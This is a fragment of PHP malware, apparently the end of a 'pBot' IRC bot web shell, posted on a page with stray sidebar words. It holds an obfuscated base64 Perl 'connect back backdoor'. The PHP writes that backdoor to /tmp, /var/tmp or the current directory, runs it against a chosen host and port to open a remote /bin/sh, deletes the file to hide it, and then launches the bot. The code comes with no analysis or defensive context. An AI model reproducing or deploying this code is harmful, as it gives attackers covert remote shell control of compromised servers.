$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl")) { unlink("dc.pl"); }
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}

$bot = new pBot;
$bot->start();
?>

Archivos

Meta